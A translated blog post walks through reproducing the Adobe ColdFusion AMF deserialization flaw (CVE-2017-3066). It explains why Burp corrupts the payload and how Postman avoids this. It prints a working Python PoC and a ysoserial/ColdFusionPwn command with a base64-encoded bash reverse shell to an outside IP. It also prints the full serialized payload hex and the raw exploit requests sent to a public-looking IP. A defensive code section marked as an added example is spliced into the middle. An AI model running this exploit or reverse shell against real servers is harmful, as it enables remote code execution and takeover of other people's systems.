
Pitfalls When Reproducing the Adobe ColdFusion Deserialization Vulnerability

Author: 黑伞安全
Published 2021-10-14 15:13:34
This article is part of the column 黑伞安全.

Adobe ColdFusion is a dynamic web server product from Adobe (USA); the CFML (ColdFusion Markup Language) it runs is a programming language designed for web applications.

Adobe ColdFusion contains a Java deserialization vulnerability. An attacker can exploit it to execute arbitrary code in the context of the affected application or to cause a denial of service. The following versions are affected: Adobe ColdFusion (2016 release) Update 3 and earlier, ColdFusion 11 Update 11 and earlier, and ColdFusion 10 Update 22 and earlier.

References:

  • https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
  • https://www.exploit-db.com/exploits/43993
  • https://github.com/codewhitesec/ColdFusionPwn

I have exploited this vulnerability in a real engagement, and it nearly broke me at the time: I went through a lot of Burp versions before it worked. Today I happened to run into the same hole again, so I set up a local environment and reproduced it.

I used the vulhub environment. (vulhub is the GOAT.)

For the initial steps, just follow https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861/README.zh-cn.md.

At this point many people's exploits fail, and the cause is Burp.

Let's look at the PoC for CVE-2017-3066:

import struct
import sys
import requests

if len(sys.argv) != 5:
    print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
    quit()

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
              '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
              struct.pack('>I', int(callback_port)) + \
              '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

Let's get started:

(base) ➜  ColdFusion java -cp coldpwn.jar:yso.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}' poc.ser

Take a look at the hex:

(base) ➜xxd  poc.ser    
00000000: 0003 0000 0001 0000 0000 0000 0001 110a  ................
00000010: 0747 6f72 672e 6170 6163 6865 2e61 7869  .Gorg.apache.axi
00000020: 7332 2e75 7469 6c2e 4d65 7461 4461 7461  s2.util.MetaData
00000030: 456e 7472 797c 998b d2c6 4fb4 e300 0000  Entry|....O.....
00000040: 0201 0000 000b 2aac ed00 0573 7200 176a  ......*....sr..j
00000050: 6176 612e 7574 696c 2e50 7269 6f72 6974  ava.util.Priorit
00000060: 7951 7565 7565 94da 30b4 fb3f 82b1 0300  yQueue..0..?....
00000070: 0249 0004 7369 7a65 4c00 0a63 6f6d 7061  .I..sizeL..compa
00000080: 7261 746f 7274 0016 4c6a 6176 612f 7574  ratort..Ljava/ut
00000090: 696c 2f43 6f6d 7061 7261 746f 723b 7870  il/Comparator;xp
000000a0: 0000 0002 7372 002b 6f72 672e 6170 6163  ....sr.+org.apac
000000b0: 6865 2e63 6f6d 6d6f 6e73 2e62 6561 6e75  he.commons.beanu
000000c0: 7469 6c73 2e42 6561 6e43 6f6d 7061 7261  tils.BeanCompara
000000d0: 746f 72cf 8e01 82fe 4ef1 7e02 0002 4c00  tor.....N.~...L.
000000e0: 0a63 6f6d 7061 7261 746f 7271 007e 0001  .comparatorq.~..
000000f0: 4c00 0870 726f 7065 7274 7974 0012 4c6a  L..propertyt..Lj
00000100: 6176 612f 6c61 6e67 2f53 7472 696e 673b  ava/lang/String;
00000110: 7870 7372 003f 6f72 672e 6170 6163 6865  xpsr.?org.apache
00000120: 2e63 6f6d 6d6f 6e73 2e63 6f6c 6c65 6374  .commons.collect
00000130: 696f 6e73 2e63 6f6d 7061 7261 746f 7273  ions.comparators
00000140: 2e43 6f6d 7061 7261 626c 6543 6f6d 7061  .ComparableCompa
00000150: 7261 746f 72fb f499 25b8 6eb1 3702 0000  rator...%.n.7...
00000160: 7870 7400 106f 7574 7075 7450 726f 7065  xpt..outputPrope
00000170: 7274 6965 7377 0400 0000 0373 7200 3a63  rtiesw.....sr.:c
00000180: 6f6d 2e73 756e 2e6f 7267 2e61 7061 6368  om.sun.org.apach
00000190: 652e 7861 6c61 6e2e 696e 7465 726e 616c  e.xalan.internal
000001a0: 2e78 736c 7463 2e74 7261 782e 5465 6d70  .xsltc.trax.Temp
000001b0: 6c61 7465 7349 6d70 6c09 574f c16e acab  latesImpl.WO.n..
000001c0: 3303 0006 4900 0d5f 696e 6465 6e74 4e75  3...I.._indentNu
000001d0: 6d62 6572 4900 0e5f 7472 616e 736c 6574  mberI.._translet
000001e0: 496e 6465 785b 000a 5f62 7974 6563 6f64  Index[.._bytecod
000001f0: 6573 7400 035b 5b42 5b00 065f 636c 6173  est..[[B[.._clas
00000200: 7374 0012 5b4c 6a61 7661 2f6c 616e 672f  st..[Ljava/lang/
00000210: 436c 6173 733b 4c00 055f 6e61 6d65 7100  Class;L.._nameq.
00000220: 7e00 044c 0011 5f6f 7574 7075 7450 726f  ~..L.._outputPro
00000230: 7065 7274 6965 7374 0016 4c6a 6176 612f  pertiest..Ljava/
00000240: 7574 696c 2f50 726f 7065 7274 6965 733b  util/Properties;
00000250: 7870 0000 0000 ffff ffff 7572 0003 5b5b  xp........ur..[[
00000260: 424b fd19 1567 67db 3702 0000 7870 0000  BK...gg.7...xp..
00000270: 0002 7572 0002 5b42 acf3 17f8 0608 54e0  ..ur..[B......T.
00000280: 0200 0078 7000 0006 f7ca feba be00 0000  ...xp...........
00000290: 3200 390a 0003 0022 0700 3707 0025 0700  2.9...."..7..%..
000002a0: 2601 0010 7365 7269 616c 5665 7273 696f  &...serialVersio
000002b0: 6e55 4944 0100 014a 0100 0d43 6f6e 7374  nUID...J...Const
000002c0: 616e 7456 616c 7565 05ad 2093 f391 ddef  antValue.. .....
000002d0: 3e01 0006 3c69 6e69 743e 0100 0328 2956  >...<init>...()V
000002e0: 0100 0443 6f64 6501 000f 4c69 6e65 4e75  ...Code...LineNu
000002f0: 6d62 6572 5461 626c 6501 0012 4c6f 6361  mberTable...Loca
00000300: 6c56 6172 6961 626c 6554 6162 6c65 0100  lVariableTable..
00000310: 0474 6869 7301 0013 5374 7562 5472 616e  .this...StubTran
00000320: 736c 6574 5061 796c 6f61 6401 000c 496e  sletPayload...In
00000330: 6e65 7243 6c61 7373 6573 0100 354c 7973  nerClasses..5Lys
00000340: 6f73 6572 6961 6c2f 7061 796c 6f61 6473  oserial/payloads
00000350: 2f75 7469 6c2f 4761 6467 6574 7324 5374  /util/Gadgets$St
00000360: 7562 5472 616e 736c 6574 5061 796c 6f61  ubTransletPayloa
00000370: 643b 0100 0974 7261 6e73 666f 726d 0100  d;...transform..
00000380: 7228 4c63 6f6d 2f73 756e 2f6f 7267 2f61  r(Lcom/sun/org/a
00000390: 7061 6368 652f 7861 6c61 6e2f 696e 7465  pache/xalan/inte
000003a0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b5b  rnal/xsltc/DOM;[
000003b0: 4c63 6f6d 2f73 756e 2f6f 7267 2f61 7061  Lcom/sun/org/apa
000003c0: 6368 652f 786d 6c2f 696e 7465 726e 616c  che/xml/internal
000003d0: 2f73 6572 6961 6c69 7a65 722f 5365 7269  /serializer/Seri
000003e0: 616c 697a 6174 696f 6e48 616e 646c 6572  alizationHandler
000003f0: 3b29 5601 0008 646f 6375 6d65 6e74 0100  ;)V...document..
00000400: 2d4c 636f 6d2f 7375 6e2f 6f72 672f 6170  -Lcom/sun/org/ap
00000410: 6163 6865 2f78 616c 616e 2f69 6e74 6572  ache/xalan/inter
00000420: 6e61 6c2f 7873 6c74 632f 444f 4d3b 0100  nal/xsltc/DOM;..
00000430: 0868 616e 646c 6572 7301 0042 5b4c 636f  .handlers..B[Lco
00000440: 6d2f 7375 6e2f 6f72 672f 6170 6163 6865  m/sun/org/apache
00000450: 2f78 6d6c 2f69 6e74 6572 6e61 6c2f 7365  /xml/internal/se
00000460: 7269 616c 697a 6572 2f53 6572 6961 6c69  rializer/Seriali
00000470: 7a61 7469 6f6e 4861 6e64 6c65 723b 0100  zationHandler;..
00000480: 0a45 7863 6570 7469 6f6e 7307 0027 0100  .Exceptions..'..
00000490: a628 4c63 6f6d 2f73 756e 2f6f 7267 2f61  .(Lcom/sun/org/a
000004a0: 7061 6368 652f 7861 6c61 6e2f 696e 7465  pache/xalan/inte
000004b0: 726e 616c 2f78 736c 7463 2f44 4f4d 3b4c  rnal/xsltc/DOM;L
000004c0: 636f 6d2f 7375 6e2f 6f72 672f 6170 6163  com/sun/org/apac
000004d0: 6865 2f78 6d6c 2f69 6e74 6572 6e61 6c2f  he/xml/internal/
000004e0: 6474 6d2f 4454 4d41 7869 7349 7465 7261  dtm/DTMAxisItera
000004f0: 746f 723b 4c63 6f6d 2f73 756e 2f6f 7267  tor;Lcom/sun/org
00000500: 2f61 7061 6368 652f 786d 6c2f 696e 7465  /apache/xml/inte
00000510: 726e 616c 2f73 6572 6961 6c69 7a65 722f  rnal/serializer/
00000520: 5365 7269 616c 697a 6174 696f 6e48 616e  SerializationHan
00000530: 646c 6572 3b29 5601 0008 6974 6572 6174  dler;)V...iterat
00000540: 6f72 0100 354c 636f 6d2f 7375 6e2f 6f72  or..5Lcom/sun/or
00000550: 672f 6170 6163 6865 2f78 6d6c 2f69 6e74  g/apache/xml/int
00000560: 6572 6e61 6c2f 6474 6d2f 4454 4d41 7869  ernal/dtm/DTMAxi
00000570: 7349 7465 7261 746f 723b 0100 0768 616e  sIterator;...han
00000580: 646c 6572 0100 414c 636f 6d2f 7375 6e2f  dler..ALcom/sun/
00000590: 6f72 672f 6170 6163 6865 2f78 6d6c 2f69  org/apache/xml/i
000005a0: 6e74 6572 6e61 6c2f 7365 7269 616c 697a  nternal/serializ
000005b0: 6572 2f53 6572 6961 6c69 7a61 7469 6f6e  er/Serialization
000005c0: 4861 6e64 6c65 723b 0100 0a53 6f75 7263  Handler;...Sourc
000005d0: 6546 696c 6501 000c 4761 6467 6574 732e  eFile...Gadgets.
000005e0: 6a61 7661 0c00 0a00 0b07 0028 0100 3379  java.......(..3y
000005f0: 736f 7365 7269 616c 2f70 6179 6c6f 6164  soserial/payload
00000600: 732f 7574 696c 2f47 6164 6765 7473 2453  s/util/Gadgets$S
00000610: 7475 6254 7261 6e73 6c65 7450 6179 6c6f  tubTransletPaylo
00000620: 6164 0100 4063 6f6d 2f73 756e 2f6f 7267  ad..@com/sun/org
00000630: 2f61 7061 6368 652f 7861 6c61 6e2f 696e  /apache/xalan/in
00000640: 7465 726e 616c 2f78 736c 7463 2f72 756e  ternal/xsltc/run
00000650: 7469 6d65 2f41 6273 7472 6163 7454 7261  time/AbstractTra
00000660: 6e73 6c65 7401 0014 6a61 7661 2f69 6f2f  nslet...java/io/
00000670: 5365 7269 616c 697a 6162 6c65 0100 3963  Serializable..9c
00000680: 6f6d 2f73 756e 2f6f 7267 2f61 7061 6368  om/sun/org/apach
00000690: 652f 7861 6c61 6e2f 696e 7465 726e 616c  e/xalan/internal
000006a0: 2f78 736c 7463 2f54 7261 6e73 6c65 7445  /xsltc/TransletE
000006b0: 7863 6570 7469 6f6e 0100 1f79 736f 7365  xception...ysose
000006c0: 7269 616c 2f70 6179 6c6f 6164 732f 7574  rial/payloads/ut
000006d0: 696c 2f47 6164 6765 7473 0100 083c 636c  il/Gadgets...<cl
000006e0: 696e 6974 3e01 0011 6a61 7661 2f6c 616e  init>...java/lan
000006f0: 672f 5275 6e74 696d 6507 002a 0100 0a67  g/Runtime..*...g
00000700: 6574 5275 6e74 696d 6501 0015 2829 4c6a  etRuntime...()Lj
00000710: 6176 612f 6c61 6e67 2f52 756e 7469 6d65  ava/lang/Runtime
00000720: 3b0c 002c 002d 0a00 2b00 2e01 0061 6261  ;..,.-..+....aba
00000730: 7368 202d 6320 7b65 6368 6f2c 596d 467a  sh -c {echo,YmFz
00000740: 6143 4174 6153 412b 4a69 4176 5a47 5632  aCAtaSA+JiAvZGV2
00000750: 4c33 526a 6343 3878 4d54 6775 4d54 6b77  L3RjcC8xMTguMTkw
00000760: 4c6a 6b33 4c6a 4535 4c7a 6778 4f44 4567  Ljk3LjE5LzgxODEg
00000770: 4d44 346d 4d51 3d3d 7d7c 7b62 6173 6536  MD4mMQ==}|{base6
00000780: 342c 2d64 7d7c 7b62 6173 682c 2d69 7d08  4,-d}|{bash,-i}.
00000790: 0030 0100 0465 7865 6301 0027 284c 6a61  .0...exec..'(Lja
000007a0: 7661 2f6c 616e 672f 5374 7269 6e67 3b29  va/lang/String;)
000007b0: 4c6a 6176 612f 6c61 6e67 2f50 726f 6365  Ljava/lang/Proce
000007c0: 7373 3b0c 0032 0033 0a00 2b00 3401 000d  ss;..2.3..+.4...
000007d0: 5374 6163 6b4d 6170 5461 626c 6501 001e  StackMapTable...
000007e0: 7973 6f73 6572 6961 6c2f 5077 6e65 7231  ysoserial/Pwner1
000007f0: 3732 3039 3430 3734 3633 3439 3830 0100  72094074634980..
00000800: 204c 7973 6f73 6572 6961 6c2f 5077 6e65   Lysoserial/Pwne
00000810: 7231 3732 3039 3430 3734 3633 3439 3830  r172094074634980
00000820: 3b00 2100 0200 0300 0100 0400 0100 1a00  ;.!.............
00000830: 0500 0600 0100 0700 0000 0200 0800 0400  ................
00000840: 0100 0a00 0b00 0100 0c00 0000 2f00 0100  ............/...
00000850: 0100 0000 052a b700 01b1 0000 0002 000d  .....*..........
00000860: 0000 0006 0001 0000 002f 000e 0000 000c  ........./......
00000870: 0001 0000 0005 000f 0038 0000 0001 0013  .........8......
00000880: 0014 0002 000c 0000 003f 0000 0003 0000  .........?......
00000890: 0001 b100 0000 0200 0d00 0000 0600 0100  ................
000008a0: 0000 3300 0e00 0000 2000 0300 0000 0100  ..3..... .......
000008b0: 0f00 3800 0000 0000 0100 1500 1600 0100  ..8.............
000008c0: 0000 0100 1700 1800 0200 1900 0000 0400  ................
000008d0: 0100 1a00 0100 1300 1b00 0200 0c00 0000  ................
000008e0: 4900 0000 0400 0000 01b1 0000 0002 000d  I...............
000008f0: 0000 0006 0001 0000 0036 000e 0000 002a  .........6.....*
00000900: 0004 0000 0001 000f 0038 0000 0000 0001  .........8......
00000910: 0015 0016 0001 0000 0001 001c 001d 0002  ................
00000920: 0000 0001 001e 001f 0003 0019 0000 0004  ................
00000930: 0001 001a 0008 0029 000b 0001 000c 0000  .......)........
00000940: 0024 0003 0002 0000 000f a700 0301 4cb8  .$............L.
00000950: 002f 1231 b600 3557 b100 0000 0100 3600  ./.1..5W......6.
00000960: 0000 0300 0103 0002 0020 0000 0002 0021  ......... .....!
00000970: 0011 0000 000a 0001 0002 0023 0010 0009  ...........#....
00000980: 7571 007e 0010 0000 01d4 cafe babe 0000  uq.~............
00000990: 0032 001b 0a00 0300 1507 0017 0700 1807  .2..............
000009a0: 0019 0100 1073 6572 6961 6c56 6572 7369  .....serialVersi
000009b0: 6f6e 5549 4401 0001 4a01 000d 436f 6e73  onUID...J...Cons
000009c0: 7461 6e74 5661 6c75 6505 71e6 69ee 3c6d  tantValue.q.i.<m
000009d0: 4718 0100 063c 696e 6974 3e01 0003 2829  G....<init>...()
000009e0: 5601 0004 436f 6465 0100 0f4c 696e 654e  V...Code...LineN
000009f0: 756d 6265 7254 6162 6c65 0100 124c 6f63  umberTable...Loc
00000a00: 616c 5661 7269 6162 6c65 5461 626c 6501  alVariableTable.
00000a10: 0004 7468 6973 0100 0346 6f6f 0100 0c49  ..this...Foo...I
00000a20: 6e6e 6572 436c 6173 7365 7301 0025 4c79  nnerClasses..%Ly
00000a30: 736f 7365 7269 616c 2f70 6179 6c6f 6164  soserial/payload
00000a40: 732f 7574 696c 2f47 6164 6765 7473 2446  s/util/Gadgets$F
00000a50: 6f6f 3b01 000a 536f 7572 6365 4669 6c65  oo;...SourceFile
00000a60: 0100 0c47 6164 6765 7473 2e6a 6176 610c  ...Gadgets.java.
00000a70: 000a 000b 0700 1a01 0023 7973 6f73 6572  .........#ysoser
00000a80: 6961 6c2f 7061 796c 6f61 6473 2f75 7469  ial/payloads/uti
00000a90: 6c2f 4761 6467 6574 7324 466f 6f01 0010  l/Gadgets$Foo...
00000aa0: 6a61 7661 2f6c 616e 672f 4f62 6a65 6374  java/lang/Object
00000ab0: 0100 146a 6176 612f 696f 2f53 6572 6961  ...java/io/Seria
00000ac0: 6c69 7a61 626c 6501 001f 7973 6f73 6572  lizable...ysoser
00000ad0: 6961 6c2f 7061 796c 6f61 6473 2f75 7469  ial/payloads/uti
00000ae0: 6c2f 4761 6467 6574 7300 2100 0200 0300  l/Gadgets.!.....
00000af0: 0100 0400 0100 1a00 0500 0600 0100 0700  ................
00000b00: 0000 0200 0800 0100 0100 0a00 0b00 0100  ................
00000b10: 0c00 0000 2f00 0100 0100 0000 052a b700  ..../........*..
00000b20: 01b1 0000 0002 000d 0000 0006 0001 0000  ................
00000b30: 003a 000e 0000 000c 0001 0000 0005 000f  .:..............
00000b40: 0012 0000 0002 0013 0000 0002 0014 0011  ................
00000b50: 0000 000a 0001 0002 0016 0010 0009 7074  ..............pt
00000b60: 0004 5077 6e72 7077 0100 7871 007e 000d  ..Pwnrpw..xq.~..
00000b70: 7801 0101                                x...

Import into Burp (this is where Burp falls over):

POST /flex2gateway/amf HTTP/1.1
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Content-Type: application/x-amf
Content-Length: 3003



\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a
Gorg.apache.axis2.util.MetaDataEntry|™‹ÒÆO´ã*¬ísrjava.util.PriorityQueue”Ú0´û?‚±IsizeL
comparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ‚þNñ~L
comparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparatorûô™%¸n±7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WOÁn¬«3I_indentNumberI_transletIndex[
_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xpÿÿÿÿur[[BKýggÛ7xpur[B¬óøTàxp÷Êþº¾29
"7%&serialVersionUIDJConstantValue­ “ó‘Ýï><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
Exceptions'¦(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
SourceFileGadgets.java
(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*
getRuntime()Ljava/lang/Runtime;,-
+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23
+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!
/*·±/8?±3 8I±6*8)$§L¸/1¶5W±6 !
#  uq~ÔÊþº¾2
serialVersionUIDJConstantValueqæiî<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;
SourceFileGadgets.java
#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!
/*·±:
  ptPwnrpwxq~x

The hex doesn't match, so the exploit cannot succeed!
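Why a body pasted into a text-based request editor can stop matching the file on disk, together with the integrity check a tester should run and a simple defender-side check for AMF requests that carry Java serialization data. This is an added example, not code from the original post or from ColdFusionPwn; the AMF body is constructed for the demo, and the latin-1 to UTF-8 round trip is an assumed model of the corruption, not a statement about Burp's internals.

```python
import hashlib
import struct

# Java serialization stream magic and version (0xACED 0x0005); it is visible
# in the xxd dump above at offset 0x46.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"
AMF_CONTENT_TYPE = "application/x-amf"


def build_constructed_body() -> bytes:
    """Constructed AMF-style body for the demo: a fixed header, a length-prefixed
    type name, the Java serialization magic and some bytes >= 0x80.
    It is NOT the page's poc.ser."""
    name = b"java.util.PriorityQueue"
    return (b"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a"
            + struct.pack(">H", len(name)) + name
            + JAVA_SERIAL_MAGIC + bytes(range(0x80, 0x90)))


def simulate_text_editor_roundtrip(raw: bytes) -> bytes:
    """Assumed model of pasting raw bytes into a text field: every byte is read
    as one character (latin-1) and the field is sent out as UTF-8. Each byte
    >= 0x80 becomes two bytes, so the body grows and no longer matches."""
    return raw.decode("latin-1").encode("utf-8")


def first_mismatch(expected: bytes, actual: bytes) -> int:
    """Offset of the first differing byte, or -1 if the two are identical."""
    for i, (a, b) in enumerate(zip(expected, actual)):
        if a != b:
            return i
    if len(expected) == len(actual):
        return -1
    return min(len(expected), len(actual))


def body_matches_file(file_bytes: bytes, sent_body: bytes) -> bool:
    """Integrity check: compare the SHA-256 of the file on disk with the body
    actually observed on the wire (for example in the proxy's history)."""
    return hashlib.sha256(file_bytes).digest() == hashlib.sha256(sent_body).digest()


def flag_amf_request(content_type: str, body: bytes) -> bool:
    """Defender-side check for WAF/IDS logic: an AMF request whose body carries
    a Java serialization stream is worth alerting on."""
    return (content_type.lower().startswith(AMF_CONTENT_TYPE)
            and JAVA_SERIAL_MAGIC in body)


if __name__ == "__main__":
    original = build_constructed_body()
    corrupted = simulate_text_editor_roundtrip(original)
    print("original length:", len(original), "after round trip:", len(corrupted))
    print("first mismatch at offset:", first_mismatch(original, corrupted))
    print("body matches file:", body_matches_file(original, corrupted))
    print("flag as suspicious AMF:", flag_amf_request(AMF_CONTENT_TYPE, original))
```

The two Content-Length values on this page (3003 via Burp, 2932 via Postman) are exactly the kind of difference `body_matches_file` would have caught before any time was spent swapping Burp versions.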

You don't need to go hunting through a pile of Burp versions to test this; Postman does it in one shot!

Configure Postman's proxy so that Postman traffic is routed through Burp.

The PoC is generated in poc.ser; send it as the request body to http://your-ip:8500/flex2gateway/amf with Content-Type application/x-amf:

Import into Postman.

Click Send.

Burp now receives the traffic:

And the hex mismatch no longer occurs.

POST /flex2gateway/amf HTTP/1.1
Content-Type: application/x-amf
User-Agent: PostmanRuntime/7.28.4
Accept: */*
Postman-Token: e6337283-3d4b-4ffb-bec0-b7f5d6575345
Host: 60.205.212.75:8006
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=21449A61E070DA3C42D224ED7EBF1F33.cfusion
Content-Length: 2932


Gorg.apache.axis2.util.MetaDataEntry|����O��*��srjava.util.PriorityQueue��0��?��IsizeL
comparatortLjava/util/Comparator;xpsr+org.apache.commons.beanutils.BeanComparatorώ��N�~L
comparatorq~LpropertytLjava/lang/String;xpsr?org.apache.commons.collections.comparators.ComparableComparator���%�n�7xptoutputPropertieswsr:com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl  WO�n��3I_indentNumberI_transletIndex[
_bytecodest[[B[_classt[Ljava/lang/Class;L_nameq~L_outputPropertiestLjava/util/Properties;xp����ur[[BK�gg�7xpur[B���T�xp�����29
"7%&serialVersionUIDJConstantValue� ����><init>()VCodeLineNumberTableLocalVariableTablethisStubTransletPayloadInnerClasses5Lysoserial/payloads/util/Gadgets$StubTransletPayload;  transformr(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Vdocument-Lcom/sun/org/apache/xalan/internal/xsltc/DOM;handlersB[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
Exceptions'�(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)Viterator5Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;handlerALcom/sun/org/apache/xml/internal/serializer/SerializationHandler;
SourceFileGadgets.java
(3ysoserial/payloads/util/Gadgets$StubTransletPayload@com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTransletjava/io/Serializable9com/sun/org/apache/xalan/internal/xsltc/TransletExceptionysoserial/payloads/util/Gadgets<clinit>java/lang/Runtime*
getRuntime()Ljava/lang/Runtime;,-
+.abash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTguMTkwLjk3LjE5LzgxODEgMD4mMQ==}|{base64,-d}|{bash,-i}0exec'(Ljava/lang/String;)Ljava/lang/Process;23
+4StackMapTableysoserial/Pwner172094074634980 Lysoserial/Pwner172094074634980;!
/*��/8?�3 8I�6*8)$�L�/1�5W�6 !
#  uq~�����2
serialVersionUIDJConstantValueq�i�<mG<init>()VCodeLineNumberTableLocalVariableTablethisFooInnerClasses%Lysoserial/payloads/util/Gadgets$Foo;
SourceFileGadgets.java
#ysoserial/payloads/util/Gadgets$Foojava/lang/Objectjava/io/Serializableysoserial/payloads/util/Gadgets!
/*��:
  ptPwnrpwxq~x
Originally published: 2021-09-14.

This article is shared from the 黑伞攻防实验室 WeChat official account.